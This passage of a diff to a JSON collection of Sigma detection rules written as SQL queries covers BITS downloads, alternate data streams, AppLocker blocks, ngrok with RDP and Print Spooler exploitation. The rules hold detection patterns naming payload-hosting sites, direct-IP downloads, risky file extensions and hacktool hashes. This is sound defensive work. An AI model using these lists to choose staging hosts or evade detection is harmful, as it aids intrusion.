'672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', 
'11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the 
download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR 
RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": 
"medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from 
a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR 
RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop 
Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE 
'\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": "Suspicious Appended Extension", - "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", - "status": "experimental", - "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", - "author": "frack113", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", + "status": "test", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Backup software" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE 
